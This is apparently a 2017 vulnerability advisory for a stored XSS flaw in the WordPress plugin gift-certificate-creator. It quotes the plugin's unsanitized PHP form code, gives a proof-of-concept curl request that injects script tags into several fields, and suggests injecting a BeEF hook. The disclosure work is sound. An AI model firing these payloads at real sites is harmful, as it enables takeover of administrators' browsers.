Advisory #: 191
Title: Unauthenticated Stored XSS Vulnerability in Wordpress plugin gift-certificate-creator v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2017-05-15
CVE-ID:[CVE-2017-1002017]
CWE:
Download Site: https://wordpress.org/plugins/gift-certificate-creator/
Vendor: Bob Cares https://bobcares.com/
Vendor Notified: 2017-05-17
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=191
Description: Gift Certificate Creator WordPress plugin allows you to manage gift certificates on your website. In a convenient front-end UI provided by this plugin, your site visitors can enter the amount and user details. On form submission, the user details will be sent to the administrator. Also, the administrator can view the list of all the certificate requests.
Vulnerability:
Publically accessible pages that are using the shortcode ‘[gift_certificate_form]’ allow any user to add gift certificate entries into the database. These entries are listed by the Wordpress administrator when visiting the plugin admin page. This action is performed by gc-list.php which doesn't sanitize the entries before displaying them. This allows malicious javascript to be injected into the WordPress database. In file giftcertificates.php 141: if ($_REQUEST['action'] == 'Submit') { 144: //if (!empty($_REQUEST['cert_amount']) && !empty($_REQUEST['cc_number']) && !empty($_REQUEST['cc_sec_code'])) { 145: if (!empty($_REQUEST['cert_amount']) && !empty($_REQUEST['cc_sec_code'])) { 147: $gcmObj->createNewGCM($_REQUEST); 149: writeLog(" amount ".$_REQUEST['cert_amount']." and email ".$_REQUEST['cc_sec_code']." are posted successfully", basename(__LINE__), basename(__FILE__)); 152: $gcmObj->sendGCMReportEmail(GC_MAIL_TO, GC_MAIL_FROM, GC_MAIL_SUBJECT, $_REQUEST); 153: $_REQUEST = array(); 212- <form method="get" name="gc_form" action=""> 213- <table class='gc_form'> 214- <tr> 215- <th>Certificate Amount:</th> 216: <td><input type="text" name="cert_amount" value="<?php echo $_REQUEST['cert_amount']; ?>" placeholder ="$"></td> 217- </tr> 218- <tr> 219- <th>Your Name:</th> 220: <td><input type="text" name="user_name" value="<?php echo $_REQUEST['user_name']; ?>"> (optional)</td> 221- </tr> 222- <tr> 223- <th>Recipient Name:</th> 224: <td><input type="text" name="receip_name" value="<?php echo $_REQUEST['receip_name']; ?>"> (optional)</td> 225- </tr> 226- <tr> 227- <th>Recipient Email:</th> 228: <td><input type="text" name="cc_sec_code" value="<?php echo $_REQUEST['cc_sec_code']; ?>"></td> 229- </tr> 230- <tr> 231- <th>Recipient Address:</th> 232: <td><textarea name="receip_address" value="<?php echo $_REQUEST['receip_address']; ?>"></textarea> 233- </tr> 234- <tr> 235- <td colspan="2" style="text-align: center;"><input type="submit" value="Submit" name="action"></td> 236- </tr> 237- </table>
Export: JSON TEXT XML
Exploit Code:
  1. $ curl http://example/index.php/2017/05/16/gift-certificates/?cert_amount=50&user_name=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&receip_name=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&cc_sec_code=no%40me.net&receip_address=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&action=Submit
Screen Shots:
Notes:
Inject a BeEF hook even.